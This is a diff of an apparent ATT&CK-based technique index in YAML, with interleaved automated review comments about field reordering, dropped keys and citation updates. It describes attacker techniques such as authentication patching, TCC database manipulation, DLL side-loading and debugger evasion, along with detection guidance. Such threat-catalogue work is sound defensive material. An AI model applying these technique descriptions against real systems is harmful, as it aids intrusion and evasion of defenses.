+ Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+ deletes an account before re-creating one with the same name.(Citation: Huntress
+ MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+ such as those associated with legitimate software, data backups, or container
+ cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+ Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+ such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+ 2024) Sometimes adversaries may model account names off of those already existing
+ in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+ \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+ which describes impersonating specific trusted individuals or organizations,
+ rather than user or service account names. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Menachem Goldstein
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - IaaS
+ - Containers
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Creation'
type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
+ id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+ created: '2024-08-05T21:39:16.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1036/010
+ external_id: T1036.010
+ - source_name: Elastic CUBA Ransomware 2022
+ description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+ Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+ August 5, 2024.
+ url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+ - source_name: Invictus IR Cloud Ransomware 2024
+ description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+ August 5, 2024.
+ url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+ - source_name: Huntress MOVEit 2023
+ description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+ CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+ url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+ - source_name: Aquasec Kubernetes Attack 2023
+ description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+ Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+ 2023.
+ url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.001:
+ technique:
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
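Review bot: the new T1036.010 description contains escaped stray whitespace inside the double-quoted scalar: `\ \n\n` before `Note that this is distinct` (a literal space followed by the paragraph break) and a trailing space before the closing quote after `account names.`; trim both so the rendered text does not carry dangling spaces. The T1556.001 reorder underneath is content-neutral apart from the `modified` bump, which continues in the following hunks.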
@@ -15606,6 +15908,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -15620,22 +15923,42 @@ defense-evasion:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.006:
technique:
- modified: '2023-07-14T14:01:41.475Z'
+ modified: '2024-09-12T19:12:13.006Z'
name: HTML Smuggling
description: |-
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
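Review bot: `x_mitre_permissions_required: [Administrator]` is removed from T1556.001 with no equivalent field in the new layout; the description still frames the technique as patching the authentication process on a domain controller and the detection text still refers to manipulating `lsass.exe`, so the privilege requirement has not gone away, only the field recording it. Note in the commit message that the field is dropped under the newer attack spec rather than letting the requirement silently disappear from the index.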
@@ -15693,48 +16016,17 @@ defense-evasion:
url: https://www.menlosecurity.com/blog/new-attack-alert-duri
- source_name: nccgroup Smuggling HTA 2017
description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
- Explorer/Edge. Retrieved May 20, 2021.
- url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+ Explorer/Edge. Retrieved September 12, 2024.
+ url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.006
atomic_tests: []
T1556.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
- type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
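Review bot: the `nccgroup Smuggling HTA 2017` URL moves to `https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/`; the slug runs `exploreredge` together without a hyphen, so please confirm the link resolves before merging (the retrieval date is updated to September 12, 2024, which suggests it was checked, but the commit should say so). The T1556.005 reorder below is content-neutral; the line breaks around `AllowReversiblePasswordEncryption` in the description predate this change.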
@@ -15756,6 +16048,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -15766,23 +16059,50 @@ defense-evasion:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1027.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:43:18.873Z'
name: Command Obfuscation
description: |-
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
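Review bot: `x_mitre_permissions_required` (`- User`, `- Administrator`) is dropped from T1556.005 with no replacement anywhere in this hunk, while the T1221 and T1055.015 objects later in this diff keep their `x_mitre_permissions_required: - User`. If upstream ATT&CK removed the field for this technique that is fine, but if the generator is silently dropping keys it needs flagging; the `x_mitre_version` bump '1.0' to '1.1' with an unchanged description suggests the change is upstream, so please confirm against the source STIX bundle and say so in the PR description.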
@@ -15823,8 +16143,9 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1027/010
external_id: T1027.010
- source_name: Twitter Richard WMIC
- description: Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.
- url: https://twitter.com/rfackroyd/status/1639136000755765254
+ description: Ackroyd, R. (2023, March 24). Twitter. Retrieved September 12,
+ 2024.
+ url: https://x.com/rfackroyd/status/1639136000755765254
- source_name: Invoke-Obfuscation
description: Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved
March 17, 2023.
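Review bot: the host rewrite `twitter.com` to `x.com` plus the new 'Retrieved September 12, 2024' date is a citation refresh, not a content change, so it should not on its own drive a technique version bump. The same rewrite is applied to the T1216.002 reference later in this diff, but the T1220 object, whose `https://twitter.com/dez_/status/986614411711442944` reference is deleted in the reorder hunk near the end, has its re-added copy outside the visible hunks; check that it received the same rewrite so the file does not end up with a mix of twitter.com and x.com hosts.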
@@ -15860,43 +16181,23 @@ defense-evasion:
url: https://redcanary.com/threat-detection-report/techniques/powershell/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1070.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Walker Johnson
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
- created: '2020-01-31T12:35:36.479Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1070.004
- url: https://attack.mitre.org/techniques/T1070/004
- - source_name: Microsoft SDelete July 2016
- url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
- description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
- 8, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:33:59.107Z'
+ name: 'Indicator Removal on Host: File Deletion'
description: |-
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del
on Windows and rm
or unlink
on Linux and macOS.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Indicator Removal on Host: File Deletion'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
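Review bot: the T1070.004 block is almost entirely key reordering (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `created`, `external_references` are deleted here and re-added a few lines further down in the next hunk), which buries the one real change, `modified` '2022-05-11' to '2024-10-15'. Emitting keys in a fixed order from the generator (an explicit key list, or `sort_keys`) would keep future regenerations to a one-line diff per object and make reviews like this one tractable.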
@@ -15907,18 +16208,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests:
- name: Delete a single file - FreeBSD/Linux/macOS
@@ -16090,7 +16409,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
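Review bot: `modified` for T1221 moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-01-12T18:16:56.176Z', and the same backwards move recurs for T1134, Hidden File System, T1055.005, T1622, T1574.002, T1055.008 and T1027.007 in later hunks. The old values all share the `14:00:00.188Z` time, which looks like a batch timestamp from an earlier import rather than a real edit time, so the new values are probably the correct upstream ones; still, anything downstream that sorts or deduplicates by `modified` will now see these techniques as older than before, so this deserves a sentence in the PR description.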
@@ -16120,13 +16439,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
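Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted from T1221 together with `spec_version: '2.1'` and nothing in this hunk re-adds it, whereas T1556.005, T1027.010, T1070.004 and T1055.015 are rewritten to `x_mitre_attack_spec_version: 3.2.0` and T1622 and T1027.007 keep 2.1.0 as context. Dropping `spec_version` everywhere is consistent and fine, but the attack-spec version should remain present on every object; if the key was moved rather than removed for T1221 it sits outside this hunk and the reviewer cannot see it, so please point to it. The same deletion without a visible replacement appears for Hidden File System, T1055.005 and T1055.008 below.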
@@ -16223,7 +16540,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -16286,7 +16602,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests:
- name: Binary simply packed by UPX (linux)
@@ -16366,7 +16681,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -16393,8 +16708,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -16422,7 +16735,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -16466,8 +16779,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -16522,7 +16833,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -16542,7 +16853,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -16592,7 +16902,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests:
- name: Space After Filename
@@ -16665,12 +16974,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -16720,12 +17028,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -16785,8 +17092,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -16803,37 +17110,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
